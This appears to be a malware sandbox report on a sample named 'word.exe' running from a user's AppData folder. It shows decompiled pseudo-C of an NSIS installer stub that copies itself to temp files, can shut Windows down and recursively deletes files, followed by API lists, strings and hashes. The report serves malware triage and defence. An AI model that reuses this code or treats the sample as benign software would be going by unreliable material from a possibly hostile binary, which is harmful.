                                      													lstrcatW(_t234, L".tmp");
                                      													_t137 = lstrcmpiW(_t234, 0x436800);
                                      													__eflags = _t137;
                                      													if(_t137 == 0) {
                                      														L67:
                                      														_t188 = 0;
                                      														__eflags = 0;
                                      														goto L68;
                                      													} else {
                                      														__eflags = _t189;
                                      														_push(_t234);
                                      														if(_t189 == 0) {
                                      															E00405C16();
                                      														} else {
                                      															E00405B99();
                                      														}
                                      														SetCurrentDirectoryW(_t234);
                                      														__eflags =  *0x435800;
                                      														if( *0x435800 == 0) {
                                      															E00406668(0x435800, 0x436800);
                                      														}
                                      														E00406668(0x42b000, _v16);
                                      														_t201 = "A" & 0x0000ffff;
                                      														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                      														__eflags = _t143;
                                      														_v12 = 0x1a;
                                      														 *0x42b800 = _t143;
                                      														do {
                                      															E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
                                      															DeleteFileW(0x420f08);
                                      															__eflags = _v8;
                                      															if(_v8 != 0) {
                                      																_t148 = CopyFileW(L"C:\\Users\\Albus\\AppData\\Roaming\\word.exe", 0x420f08, 1);
                                      																__eflags = _t148;
                                      																if(_t148 != 0) {
                                      																	E00406428(_t201, 0x420f08, 0);
                                      																	E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
                                      																	_t152 = E00405C4B(0x420f08);
                                      																	__eflags = _t152;
                                      																	if(_t152 != 0) {
                                      																		CloseHandle(_t152);
                                      																		_v8 = 0;
                                      																	}
                                      																}
                                      															}
                                      															 *0x42b800 =  *0x42b800 + 1;
                                      															_t61 =  &_v12;
                                      															 *_t61 = _v12 - 1;
                                      															__eflags =  *_t61;
                                      														} while ( *_t61 != 0);
                                      														E00406428(_t201, _t234, 0);
                                      														goto L67;
                                      													}
                                      												}
                                      												 *_t218 = _t188;
                                      												_t221 =  &(_t218[2]);
                                      												_t157 = E0040603F(_t263,  &(_t218[2]));
                                      												_t264 = _t157;
                                      												if(_t157 == 0) {
                                      													goto L68;
                                      												}
                                      												E00406668(0x435800, _t221);
                                      												E00406668(0x436000, _t221);
                                      												_v8 = _t188;
                                      												goto L51;
                                      											}
                                      											asm("cdq");
                                      											asm("cdq");
                                      											asm("cdq");
                                      											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                      											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
                                      											while( *_t218 != _t204 || _t218[1] != _t167) {
                                      												_t218 = _t218;
                                      												if(_t218 >= 0x435000) {
                                      													continue;
                                      												}
                                      												break;
                                      											}
                                      											_t188 = 0;
                                      											goto L48;
                                      										}
                                      										GetWindowsDirectoryW(_t234, 0x3fb);
                                      										lstrcatW(_t234, L"\\Temp");
                                      										_t170 = E0040360F(_t198, _t252);
                                      										_t253 = _t170;
                                      										if(_t170 != 0) {
                                      											goto L40;
                                      										}
                                      										GetTempPathW(0x3fc, _t234);
                                      										lstrcatW(_t234, L"Low");
                                      										SetEnvironmentVariableW(L"TEMP", _t234);
                                      										SetEnvironmentVariableW(L"TMP", _t234);
                                      										_t175 = E0040360F(_t198, _t253);
                                      										_t254 = _t175;
                                      										if(_t175 == 0) {
                                      											goto L68;
                                      										}
                                      										goto L40;
                                      									}
                                      									goto L31;
                                      								}
                                      								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
                                      								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
                                      									goto L29;
                                      								}
                                      								_t177 =  *((intOrPtr*)(_t198 + 8));
                                      								__eflags = _t177 - 0x20;
                                      								if(_t177 == 0x20) {
                                      									L28:
                                      									_t36 =  &_v20;
                                      									 *_t36 = _v20 | 0x00000004;
                                      									__eflags =  *_t36;
                                      									goto L29;
                                      								}
                                      								__eflags = _t177 - _t188;
                                      								if(_t177 != _t188) {
                                      									goto L29;
                                      								}
                                      								goto L28;
                                      							}
                                      							_t178 =  *((intOrPtr*)(_t198 + 2));
                                      							__eflags = _t178 - _t209;
                                      							if(_t178 == _t209) {
                                      								L23:
                                      								 *0x42a300 = 1;
                                      								goto L24;
                                      							}
                                      							__eflags = _t178 - _t188;
                                      							if(_t178 != _t188) {
                                      								goto L24;
                                      							}
                                      							goto L23;
                                      						}
                                      					} else {
                                      						goto L16;
                                      					}
                                      					do {
                                      						L16:
                                      						_t198 = _t198 + 2;
                                      						__eflags =  *_t198 - _t209;
                                      					} while ( *_t198 == _t209);
                                      					goto L17;
                                      				}
                                      				goto L37;
                                      			}















































                                      0x0040364e
                                      0x0040364f
                                      0x00403656
                                      0x00403659
                                      0x00403660
                                      0x00403663
                                      0x00403676
                                      0x0040367c
                                      0x0040367f
                                      0x00403682
                                      0x00403690
                                      0x00403698
                                      0x004036a3
                                      0x004036bc
                                      0x004036be
                                      0x004036c6
                                      0x004036c6
                                      0x004036d1
                                      0x004036d3
                                      0x004036d3
                                      0x004036e8
                                      0x0040370d
                                      0x0040371b
                                      0x0040371e
                                      0x00403725
                                      0x0040372c
                                      0x0040372c
                                      0x00403725
                                      0x0040372e
                                      0x00403733
                                      0x00403734
                                      0x00403740
                                      0x00403744
                                      0x0040374b
                                      0x00403759
                                      0x0040375e
                                      0x00403765
                                      0x00403769
                                      0x0040376d
                                      0x0040376f
                                      0x0040376f
                                      0x0040376d
                                      0x00403776
                                      0x0040377d
                                      0x00403783
                                      0x0040379b
                                      0x004037ab
                                      0x004037bd
                                      0x004037c4
                                      0x004037c6
                                      0x004037c7
                                      0x004037d8
                                      0x004037dc
                                      0x004037dc
                                      0x004037ef
                                      0x004037f1
                                      0x004038eb
                                      0x004038eb
                                      0x004038ee
                                      0x004038f1
                                      0x00000000
                                      0x00000000
                                      0x004037fb
                                      0x004037fc
                                      0x004037ff
                                      0x00403808
                                      0x00403808
                                      0x0040380b
                                      0x0040380e
                                      0x00403811
                                      0x00403814
                                      0x00403814
                                      0x00403814
                                      0x00403815
                                      0x00403819
                                      0x004038d9
                                      0x004038e2
                                      0x004038e4
                                      0x004038e7
                                      0x004038ea
                                      0x004038ea
                                      0x004038ea
                                      0x00000000
                                      0x0040381f
                                      0x00403820
                                      0x00403821
                                      0x00403825
                                      0x0040383f
                                      0x00403846
                                      0x00403859
                                      0x0040385a
                                      0x0040386f
                                      0x00403874
                                      0x00403876
                                      0x00403878
                                      0x00403894
                                      0x0040389b
                                      0x004038ae
                                      0x004038af
                                      0x004038c4
                                      0x004038ca
                                      0x004038cc
                                      0x004038ce
                                      0x004038d6
                                      0x004038d8
                                      0x00000000
                                      0x004038d8
                                      0x004038d2
                                      0x004038d4
                                      0x004038f9
                                      0x004038fd
                                      0x00403906
                                      0x0040390b
                                      0x00403911
                                      0x0040391c
                                      0x0040391e
                                      0x00403923
                                      0x00403925
                                      0x0040397d
                                      0x00403982
                                      0x0040398b
                                      0x00403992
                                      0x00403995
                                      0x00403b6c
                                      0x00403b6c
                                      0x00403b71
                                      0x00403b7a
                                      0x00403b97
                                      0x00403c0f
                                      0x00403c0f
                                      0x00403c17
                                      0x00403c19
                                      0x00403c19
                                      0x00403c1f
                                      0x00403c1f
                                      0x00403bae
                                      0x00403bba
                                      0x00403bcb
                                      0x00403bd2
                                      0x00403bd9
                                      0x00403bd9
                                      0x00403be1
                                      0x00403bed
                                      0x00403bfb
                                      0x00403c06
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00403bef
                                      0x00403bef
                                      0x00403bf0
                                      0x00403bf2
                                      0x00403bf3
                                      0x00403bf4
                                      0x00403bf9
                                      0x00403c08
                                      0x00403c0a
                                      0x00000000
                                      0x00403c0a
                                      0x00000000
                                      0x00403bf9
                                      0x00403bed
                                      0x00403b84
                                      0x00403b8b
                                      0x00403b8b
                                      0x004039a1
                                      0x00403a48
                                      0x00403a48
                                      0x00403a54
                                      0x00000000
                                      0x00403a54
                                      0x004039b2
                                      0x004039ba
                                      0x00403a0c
                                      0x00403a0c
                                      0x00403a12
                                      0x00403a19
                                      0x00403a67
                                      0x00403a69
                                      0x00403a6e
                                      0x00403a70
                                      0x00403a78
                                      0x00403a78
                                      0x00403a83
                                      0x00403a8f
                                      0x00403a95
                                      0x00403a97
                                      0x00403b6a
                                      0x00403b6a
                                      0x00403b6a
                                      0x00000000
                                      0x00403a9d
                                      0x00403a9d
                                      0x00403a9f
                                      0x00403aa0
                                      0x00403aa9
                                      0x00403aa2
                                      0x00403aa2
                                      0x00403aa2
                                      0x00403aaf
                                      0x00403ab7
                                      0x00403abe
                                      0x00403ac6
                                      0x00403ac6
                                      0x00403ad3
                                      0x00403adf
                                      0x00403ae9
                                      0x00403ae9
                                      0x00403aeb
                                      0x00403af2
                                      0x00403afc
                                      0x00403b08
                                      0x00403b0e
                                      0x00403b14
                                      0x00403b17
                                      0x00403b21
                                      0x00403b27
                                      0x00403b29
                                      0x00403b2d
                                      0x00403b3e
                                      0x00403b44
                                      0x00403b49
                                      0x00403b4b
                                      0x00403b4e
                                      0x00403b54
                                      0x00403b54
                                      0x00403b4b
                                      0x00403b29
                                      0x00403b57
                                      0x00403b5e
                                      0x00403b5e
                                      0x00403b5e
                                      0x00403b5e
                                      0x00403b65
                                      0x00000000
                                      0x00403b65
                                      0x00403a97
                                      0x00403a1b
                                      0x00403a1e
                                      0x00403a22
                                      0x00403a27
                                      0x00403a29
                                      0x00000000
                                      0x00000000
                                      0x00403a35
                                      0x00403a40
                                      0x00403a45
                                      0x00000000
                                      0x00403a45
                                      0x004039c3
                                      0x004039db
                                      0x004039ec
                                      0x004039ed
                                      0x004039f1
                                      0x004039f3
                                      0x00403a01
                                      0x00403a08
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00403a08
                                      0x00403a0a
                                      0x00000000
                                      0x00403a0a
                                      0x0040392d
                                      0x00403939
                                      0x0040393e
                                      0x00403943
                                      0x00403945
                                      0x00000000
                                      0x00000000
                                      0x0040394d
                                      0x00403955
                                      0x00403966
                                      0x0040396e
                                      0x00403970
                                      0x00403975
                                      0x00403977
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00403977
                                      0x00000000
                                      0x004038d4
                                      0x0040387d
                                      0x0040387f
                                      0x00000000
                                      0x00000000
                                      0x00403881
                                      0x00403885
                                      0x00403889
                                      0x00403890
                                      0x00403890
                                      0x00403890
                                      0x00403890
                                      0x00000000
                                      0x00403890
                                      0x0040388b
                                      0x0040388e
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040388e
                                      0x00403827
                                      0x0040382b
                                      0x0040382e
                                      0x00403835
                                      0x00403835
                                      0x00000000
                                      0x00403835
                                      0x00403830
                                      0x00403833
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00403833
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00403801
                                      0x00403801
                                      0x00403802
                                      0x00403803
                                      0x00403803
                                      0x00000000
                                      0x00403801
                                      0x00000000

                                      APIs
                                      • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                                      • GetVersionExW.KERNEL32(?), ref: 0040368C
                                      • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                      • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                      • OleInitialize.OLE32(00000000), ref: 0040377D
                                      • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                                      • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                                      • CharNextW.USER32(00000000), ref: 004037E9
                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040391C
                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                                      • lstrcatW.KERNEL32 ref: 00403939
                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 0040394D
                                      • lstrcatW.KERNEL32 ref: 00403955
                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                                      • DeleteFileW.KERNELBASE(1033), ref: 00403982
                                      • lstrcatW.KERNEL32 ref: 00403A69
                                      • lstrcatW.KERNEL32 ref: 00403A78
                                        • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                      • lstrcatW.KERNEL32 ref: 00403A83
                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,?), ref: 00403A8F
                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                                      • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                                      • CopyFileW.KERNEL32 ref: 00403B21
                                      • CloseHandle.KERNEL32(00000000), ref: 00403B4E
                                      • ExitProcess.KERNELBASE(?), ref: 00403B6C
                                      • OleUninitialize.OLE32 ref: 00403B71
                                      • ExitProcess.KERNEL32 ref: 00403B8B
                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                                      • ExitProcess.KERNEL32 ref: 00403C1F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                      • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\word.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                      • API String ID: 2292928366-1826018249
                                      • Opcode ID: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                      • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                                      • Opcode Fuzzy Hash: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                      • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 395 405d74-405d9a call 40603f 398 405db3-405dba 395->398 399 405d9c-405dae DeleteFileW 395->399 401 405dbc-405dbe 398->401 402 405dcd-405ddd call 406668 398->402 400 405f30-405f34 399->400 403 405dc4-405dc7 401->403 404 405ede-405ee3 401->404 410 405dec-405ded call 405f83 402->410 411 405ddf-405dea lstrcatW 402->411 403->402 403->404 404->400 406 405ee5-405ee8 404->406 408 405ef2-405efa call 40699e 406->408 409 405eea-405ef0 406->409 408->400 419 405efc-405f10 call 405f37 call 405d2c 408->419 409->400 414 405df2-405df6 410->414 411->414 415 405e02-405e08 lstrcatW 414->415 416 405df8-405e00 414->416 418 405e0d-405e29 lstrlenW FindFirstFileW 415->418 416->415 416->418 420 405ed3-405ed7 418->420 421 405e2f-405e37 418->421 435 405f12-405f15 419->435 436 405f28-405f2b call 4056ca 419->436 420->404 426 405ed9 420->426 423 405e57-405e6b call 406668 421->423 424 405e39-405e41 421->424 437 405e82-405e8d call 405d2c 423->437 438 405e6d-405e75 423->438 427 405e43-405e4b 424->427 428 405eb6-405ec6 FindNextFileW 424->428 426->404 427->423 431 405e4d-405e55 427->431 428->421 434 405ecc-405ecd FindClose 428->434 431->423 431->428 434->420 435->409 441 405f17-405f26 call 4056ca call 406428 435->441 436->400 446 405eae-405eb1 call 4056ca 437->446 447 405e8f-405e92 437->447 438->428 442 405e77-405e80 call 405d74 438->442 441->400 442->428 446->428 450 405e94-405ea4 call 4056ca call 406428 447->450 451 405ea6-405eac 447->451 450->428 451->428
                                      C-Code - Quality: 98%
                                      			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
                                      				signed int _v8;
                                      				signed int _v12;
                                      				short _v556;
                                      				short _v558;
                                      				struct _WIN32_FIND_DATAW _v604;
                                      				signed int _t38;
                                      				signed int _t52;
                                      				signed int _t55;
                                      				signed int _t62;
                                      				void* _t64;
                                      				signed char _t65;
                                      				WCHAR* _t66;
                                      				void* _t67;
                                      				WCHAR* _t68;
                                      				void* _t70;
                                      
                                      				_t65 = _a8;
                                      				_t68 = _a4;
                                      				_v8 = _t65 & 0x00000004;
                                      				_t38 = E0040603F(__eflags, _t68);
                                      				_v12 = _t38;
                                      				if((_t65 & 0x00000008) != 0) {
                                      					_t62 = DeleteFileW(_t68); // executed
                                      					asm("sbb eax, eax");
                                      					_t64 =  ~_t62 + 1;
                                      					 *0x42a2e8 =  *0x42a2e8 + _t64;
                                      					return _t64;
                                      				}
                                      				_a4 = _t65;
                                      				_t8 =  &_a4;
                                      				 *_t8 = _a4 & 0x00000001;
                                      				__eflags =  *_t8;
                                      				if( *_t8 == 0) {
                                      					L5:
                                      					E00406668(0x425750, _t68);
                                      					__eflags = _a4;
                                      					if(_a4 == 0) {
                                      						E00405F83(_t68);
                                      					} else {
                                      						lstrcatW(0x425750, L"\\*.*");
                                      					}
                                      					__eflags =  *_t68;
                                      					if( *_t68 != 0) {
                                      						L10:
                                      						lstrcatW(_t68, 0x40a014);
                                      						L11:
                                      						_t66 =  &(_t68[lstrlenW(_t68)]);
                                      						_t38 = FindFirstFileW(0x425750,  &_v604); // executed
                                      						_t70 = _t38;
                                      						__eflags = _t70 - 0xffffffff;
                                      						if(_t70 == 0xffffffff) {
                                      							L26:
                                      							__eflags = _a4;
                                      							if(_a4 != 0) {
                                      								_t30 = _t66 - 2;
                                      								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                      								__eflags =  *_t30;
                                      							}
                                      							goto L28;
                                      						} else {
                                      							goto L12;
                                      						}
                                      						do {
                                      							L12:
                                      							__eflags = _v604.cFileName - 0x2e;
                                      							if(_v604.cFileName != 0x2e) {
                                      								L16:
                                      								E00406668(_t66,  &(_v604.cFileName));
                                      								__eflags = _v604.dwFileAttributes & 0x00000010;
                                      								if(__eflags == 0) {
                                      									_t52 = E00405D2C(__eflags, _t68, _v8);
                                      									__eflags = _t52;
                                      									if(_t52 != 0) {
                                      										E004056CA(0xfffffff2, _t68);
                                      									} else {
                                      										__eflags = _v8 - _t52;
                                      										if(_v8 == _t52) {
                                      											 *0x42a2e8 =  *0x42a2e8 + 1;
                                      										} else {
                                      											E004056CA(0xfffffff1, _t68);
                                      											E00406428(_t67, _t68, 0);
                                      										}
                                      									}
                                      								} else {
                                      									__eflags = (_a8 & 0x00000003) - 3;
                                      									if(__eflags == 0) {
                                      										E00405D74(__eflags, _t68, _a8);
                                      									}
                                      								}
                                      								goto L24;
                                      							}
                                      							__eflags = _v558;
                                      							if(_v558 == 0) {
                                      								goto L24;
                                      							}
                                      							__eflags = _v558 - 0x2e;
                                      							if(_v558 != 0x2e) {
                                      								goto L16;
                                      							}
                                      							__eflags = _v556;
                                      							if(_v556 == 0) {
                                      								goto L24;
                                      							}
                                      							goto L16;
                                      							L24:
                                      							_t55 = FindNextFileW(_t70,  &_v604); // executed
                                      							__eflags = _t55;
                                      						} while (_t55 != 0);
                                      						_t38 = FindClose(_t70); // executed
                                      						goto L26;
                                      					}
                                      					__eflags =  *0x425750 - 0x5c;
                                      					if( *0x425750 != 0x5c) {
                                      						goto L11;
                                      					}
                                      					goto L10;
                                      				} else {
                                      					__eflags = _t38;
                                      					if(_t38 == 0) {
                                      						L28:
                                      						__eflags = _a4;
                                      						if(_a4 == 0) {
                                      							L36:
                                      							return _t38;
                                      						}
                                      						__eflags = _v12;
                                      						if(_v12 != 0) {
                                      							_t38 = E0040699E(_t68);
                                      							__eflags = _t38;
                                      							if(_t38 == 0) {
                                      								goto L36;
                                      							}
                                      							E00405F37(_t68);
                                      							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
                                      							__eflags = _t38;
                                      							if(_t38 != 0) {
                                      								return E004056CA(0xffffffe5, _t68);
                                      							}
                                      							__eflags = _v8;
                                      							if(_v8 == 0) {
                                      								goto L30;
                                      							}
                                      							E004056CA(0xfffffff1, _t68);
                                      							return E00406428(_t67, _t68, 0);
                                      						}
                                      						L30:
                                      						 *0x42a2e8 =  *0x42a2e8 + 1;
                                      						return _t38;
                                      					}
                                      					__eflags = _t65 & 0x00000002;
                                      					if((_t65 & 0x00000002) == 0) {
                                      						goto L28;
                                      					}
                                      					goto L5;
                                      				}
                                      			}


















                                      0x00405d7e
                                      0x00405d83
                                      0x00405d8c
                                      0x00405d8f
                                      0x00405d97
                                      0x00405d9a
                                      0x00405d9d
                                      0x00405da5
                                      0x00405da7
                                      0x00405da8
                                      0x00000000
                                      0x00405da8
                                      0x00405db3
                                      0x00405db6
                                      0x00405db6
                                      0x00405db6
                                      0x00405dba
                                      0x00405dcd
                                      0x00405dd4
                                      0x00405dd9
                                      0x00405ddd
                                      0x00405ded
                                      0x00405ddf
                                      0x00405de5
                                      0x00405de5
                                      0x00405df2
                                      0x00405df6
                                      0x00405e02
                                      0x00405e08
                                      0x00405e0d
                                      0x00405e13
                                      0x00405e1e
                                      0x00405e24
                                      0x00405e26
                                      0x00405e29
                                      0x00405ed3
                                      0x00405ed3
                                      0x00405ed7
                                      0x00405ed9
                                      0x00405ed9
                                      0x00405ed9
                                      0x00405ed9
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00405e2f
                                      0x00405e2f
                                      0x00405e2f
                                      0x00405e37
                                      0x00405e57
                                      0x00405e5f
                                      0x00405e64
                                      0x00405e6b
                                      0x00405e86
                                      0x00405e8b
                                      0x00405e8d
                                      0x00405eb1
                                      0x00405e8f
                                      0x00405e8f
                                      0x00405e92
                                      0x00405ea6
                                      0x00405e94
                                      0x00405e97
                                      0x00405e9f
                                      0x00405e9f
                                      0x00405e92
                                      0x00405e6d
                                      0x00405e73
                                      0x00405e75
                                      0x00405e7b
                                      0x00405e7b
                                      0x00405e75
                                      0x00000000
                                      0x00405e6b
                                      0x00405e39
                                      0x00405e41
                                      0x00000000
                                      0x00000000
                                      0x00405e43
                                      0x00405e4b
                                      0x00000000
                                      0x00000000
                                      0x00405e4d
                                      0x00405e55
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00405eb6
                                      0x00405ebe
                                      0x00405ec4
                                      0x00405ec4
                                      0x00405ecd
                                      0x00000000
                                      0x00405ecd
                                      0x00405df8
                                      0x00405e00
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00405dbc
                                      0x00405dbc
                                      0x00405dbe
                                      0x00405ede
                                      0x00405ee0
                                      0x00405ee3
                                      0x00405f34
                                      0x00405f34
                                      0x00405f34
                                      0x00405ee5
                                      0x00405ee8
                                      0x00405ef3
                                      0x00405ef8
                                      0x00405efa
                                      0x00000000
                                      0x00000000
                                      0x00405efd
                                      0x00405f09
                                      0x00405f0e
                                      0x00405f10
                                      0x00000000
                                      0x00405f2b
                                      0x00405f12
                                      0x00405f15
                                      0x00000000
                                      0x00000000
                                      0x00405f1a
                                      0x00000000
                                      0x00405f21
                                      0x00405eea
                                      0x00405eea
                                      0x00000000
                                      0x00405eea
                                      0x00405dc4
                                      0x00405dc7
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00405dc7

                                      APIs
                                      • DeleteFileW.KERNELBASE(?,?,7556D4C4,755513E0,00000000), ref: 00405D9D
                                      • lstrcatW.KERNEL32 ref: 00405DE5
                                      • lstrcatW.KERNEL32 ref: 00405E08
                                      • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsv4185.tmp\*.*,?,?,7556D4C4,755513E0,00000000), ref: 00405E0E
                                      • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsv4185.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsv4185.tmp\*.*,?,?,7556D4C4,755513E0,00000000), ref: 00405E1E
                                      • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                      • FindClose.KERNELBASE(00000000), ref: 00405ECD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                      • String ID: .$.$C:\Users\user\AppData\Local\Temp\nsv4185.tmp\*.*$\*.*
                                      • API String ID: 2035342205-872529241
                                      • Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                      • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                      • Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                      • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
